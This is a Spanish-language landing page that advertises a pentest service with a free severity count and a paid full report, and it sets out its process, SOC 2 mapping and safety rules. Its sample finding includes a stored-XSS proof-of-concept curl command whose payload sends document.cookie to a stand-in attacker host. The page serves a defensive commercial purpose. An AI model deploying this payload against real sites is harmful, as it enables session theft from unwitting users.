Acceso anticipado · Pentest

Pentest gratis. Paga solo para desbloquear el informe.

Ejecutamos un pentest autorizado contra tu aplicación web sin coste y compartimos el recuento por severidad. Desbloquea los findings completos (pasos de reproducción, puntuaciones CVSS, guía de remediación y evidencias SOC 2) por un precio fijo escrito en la autorización antes de empezar.

Sin tarjeta de crédito Respuesta en 24 h con propuesta Entrega en 7-14 días
Ejemplo de recuento por severidad: lo que llega gratis
Critical 1
High 2
Medium 4
Low 6
Informational 3
Alineado con OWASP WSTG Evidencias SOC 2 Autorización firmada Testing no destructivo Re-test incluido
Por qué existe esto

La mayoría de SaaS early-stage sale a producción con exposiciones críticas que nadie está testeando.

Un pentest tradicional cuesta entre 8.000 y 40.000 euros y tarda dos meses desde compras hasta entrega. Por eso los founders lo posponen más allá de la auditoría SOC 2, más allá de la revisión de compras enterprise y a veces más allá del breach.

Hemos quitado la barrera económica de entrada para que la conversación arranque con findings, no con facturas. Solo pagas cuando hay algo por lo que valga la pena pagar, y decides si el informe vale el precio después de haber visto el recuento por severidad.

8/10
de las web apps SaaS early-stage que testeamos muestran al menos un finding critical o high en la primera pasada.
Cómo funciona

Cuatro pasos. De siete a catorce días end to end.

Sin loop de compras. Sin lista de espera trimestral. Sin negociación de tarifa por día. Todo el arranque se hace con un solo formulario y una sola call.

1

Cuéntanos sobre tu stack

Email de trabajo y URL de la aplicación que quieres testear. Eso es todo.

~30 segundos
2

Call de scoping

Quince minutos para confirmar activos in-scope, roles de autenticación y subsistemas out-of-scope. Precio de desbloqueo cotizado el mismo día.

15 minutos
3

Autorización firmada

Un documento breve define scope, rate limits, reglas no destructivas y el precio fijo de desbloqueo. No empezamos sin que esté contrafirmado.

Misma semana
4

Resultados entregados

El recuento por severidad llega gratis. Desbloquea el informe completo para recibir findings, CVSS, pasos de reproducción, guía de remediación y evidencias SOC 2.

7-14 días
Qué obtienes

Recuento por severidad gratis. Desbloqueo de pago para el informe completo.

El tier gratuito existe para que decidas con información si pasar al tier de pago. Si no encontramos nada critical, no debes nada.

Paso uno

Baseline gratuita

Sin coste · Sin obligación
  • Número de findings critical
  • Número de findings high
  • Número de findings medium
  • Executive summary de un párrafo
  • Aviso en 24 horas si se confirma un critical durante los tests
Paso dos (opcional)

Desbloqueo del informe completo

Precio fijo · Fijado antes de los tests
  • Cada finding con descripción, evidencia y capturas
  • Puntuación CVSS 3.1 y clasificación CWE
  • Receta de reproducción para que tus ingenieros confirmen el fix
  • Guía de remediación con sugerencias a nivel de código
  • Mapping a controles SOC 2 (CC4.1, CC7.1, CC7.4) para tu auditor
  • Un re-test gratis de los findings remediados en un plazo de 60 días
  • Carta de atestación válida para compras e inversor
Cómo funciona el precio. El precio de desbloqueo depende del tamaño de la empresa, el sector y el scope (subdominios, roles autenticados, APIs). Queda escrito en el documento de autorización antes de empezar los tests. Sin facturas sorpresa.
Finding de ejemplo

Así se ve un finding individual.

Cada finding del informe de pago sigue la misma estructura: clasificación, evidencia, receta de reproducción, blast radius y un snippet de remediación que los ingenieros pueden desplegar sin una reunión de follow-up.

La card de la derecha es ilustrativa. Descarga abajo un ejemplo sanitizado de seis páginas del informe completo.

Descargar informe de ejemplo (PDF)

SP-001 · Detalle del finding
Critical CVSS 9.0 CWE-79
Stored XSS en el renderer de comentarios
POST /api/v1/comments · rendered at /app/threads/{id}
Proof of concept
curl -X POST https://app.example.com/api/v1/comments \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
Por qué importa
El payload se renderiza sin sanitizar en cada vista del listado de comentarios. Cualquier usuario autenticado con permiso de escritura puede pivotar al robo de sesión de cualquier viewer del thread afectado, incluidos admins.
Remediación
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Evidencias listas para auditoría

Mapeado a controles SOC 2 y OWASP WSTG.

Los auditores quieren evidencias, no capturas. El informe de pago conecta cada finding con el criterio SOC 2 al que toca, y nuestra cobertura de testing mapea sobre la OWASP Web Security Testing Guide, para que puedas demostrar scope completo, no muestreo selectivo.

Control SOC 2Qué testeamosSección OWASP WSTG
CC4.1 MonitoringCobertura de detección sobre injection, broken auth y rutas de privilege escalationWSTG-INPV, WSTG-ATHN, WSTG-ATHZ
CC7.1 System operationsCompletitud de logs y resistencia a manipulación bajo actividad de atacanteWSTG-ERRH, WSTG-CRYP
CC7.4 Incident responseVerifica que las alertas saltan en los patrones de ataque que tu runbook dice cubrirWSTG-CONF, WSTG-IDNT

Tras la remediación re-testeamos los mismos controles y emitimos una atestación de follow-up. El re-test está incluido en el precio de desbloqueo durante 60 días.

Seguridad y aspectos legales

Cómo evitamos que el test se convierta en el incidente.

El pentest autorizado es una práctica definida desde hace más de veinte años. No hacemos nada sin tu permiso firmado, y una vez que lo tenemos seguimos un conjunto estricto de reglas operativas para que el test no se convierta nunca en el incidente.

Verificación de propiedad del dominio

Confirmamos que controlas el activo mediante un registro DNS TXT o una carta firmada en papel con membrete corporativo. Sin excepciones, ni siquiera con clientes ya conocidos.

Techo de rate limit

Las probes automatizadas están limitadas a 10 peticiones por segundo por host. La explotación manual va a velocidad humana. Tu monitoring verá tráfico, no presión.

Testing no destructivo

No borramos, modificamos ni exfiltramos datos de producción. La evidencia de proof-of-concept se captura con la profundidad mínima necesaria para confirmar la vulnerabilidad.

Cifrado en tránsito y en reposo

Findings, pruebas y capturas se cifran end to end. El acceso queda limitado al lead tester y a un solo revisor.

Retención de datos

Los informes se conservan 90 días para soportar el re-test incluido y luego se eliminan a petición. Nunca compartimos findings con nadie fuera del proyecto.

Respeto al out-of-scope

Todo lo declarado out-of-scope en la autorización se trata como production-critical. Si un finding lo atraviesa, paramos y consultamos antes de seguir.

Add-on opcional

OSINT: lo que internet ya sabe sobre tu equipo.

El pentest cubre tu aplicación. El add-on OSINT cubre el perímetro que no puedes parchear: credenciales filtradas en dumps públicos, buckets S3 expuestos e indexados por buscadores, repositorios de GitHub con tokens hardcoded y la huella de LinkedIn que hace trivial el phishing dirigido.

Cotizado como proyecto aparte. La mayoría de equipos lo añaden en el segundo ciclo, después de remediar los findings de la aplicación.

El OSINT scan cubre

  • Dumps de credenciales y datasets de breach
  • Repositorios de código públicos
  • Índices de cloud storage y fugas de metadatos
  • Mapeo de superficie de ingeniería social
  • Monitorización de typo-squat y dominios lookalike
Solicita

Haz tu scoping esta semana.

Deja tu email de trabajo y la URL de la aplicación que quieres testear. Respondemos en 24 horas con un scope propuesto, el precio de desbloqueo y un slot de call de 15 minutos.

  • Respuesta en 24 horas con el precio exacto de desbloqueo.
  • Cotizamos directamente. Sin traspaso comercial.
  • Ves el recuento por severidad antes de decidir si desbloquear.
  • La página nunca enseña una etiqueta de precio porque cada proyecto se cotiza.

Pide un pentest gratis

Dos campos. Del resto nos encargamos.

Sin tarjeta de crédito. No commitment. You'll receive the proposal and the exact unlock price within 24 hours.

FAQ

Las preguntas que recibimos cada semana.

¿Cuánto dura el proyecto? +
La mayoría de proyectos duran entre 7 y 14 días desde la autorización hasta la entrega. La call de scoping de 15 minutos suele ocurrir en las primeras 24 horas tras la solicitud, y la autorización se firma esa misma semana.
¿Y si no encontráis nada grave? +
Igualmente recibes el recuento por severidad gratuito y un resumen breve. No estás obligado a desbloquear el informe completo si no aparece nada critical o high. Una baseline limpia ya es de por sí un artefacto útil para inversores y equipos de compras.
¿Y si encontráis algo explotable? +
Te avisamos en 24 horas tras la confirmación, antes de la entrega, para que tu equipo pueda empezar la remediación de inmediato. El informe completo incluye una receta de reproducción, una evaluación del blast radius y una sugerencia de parche por cada finding.
¿Cómo se fija el precio de desbloqueo? +
El precio depende del tamaño de la empresa, el sector y el scope (número de subdominios, roles autenticados, APIs). Queda escrito en el documento de autorización antes de empezar los tests. Nunca recibirás una factura sorpresa.
¿Es legal? +
Sí. El pentest bajo autorización firmada es práctica estándar desde hace más de veinte años. El documento de autorización concede permiso explícito, define el scope (activos in-scope y out-of-scope), fija un techo de rate limit y confirma las reglas de testing no destructivo. Sin ese documento no hacemos ningún test.
¿Cuánto tiempo guardáis mis datos? +
Findings y pruebas se cifran en tránsito y en reposo, se conservan 90 días para el re-test y las evidencias SOC 2, y luego se eliminan a petición. No exfiltramos datos de clientes; las pruebas se reducen al mínimo necesario para confirmar la vulnerabilidad.

Descubre lo que encontraría un atacante antes que tú.

Baseline gratuita. Desbloqueo de pago solo si hay algo por lo que valga la pena pagar. Scoping esta semana.

Pide un pentest gratis
Sin tarjeta de crédito · Sin loop de compras · Respuesta en 24 h con el precio exacto de desbloqueo
Pide un pentest gratis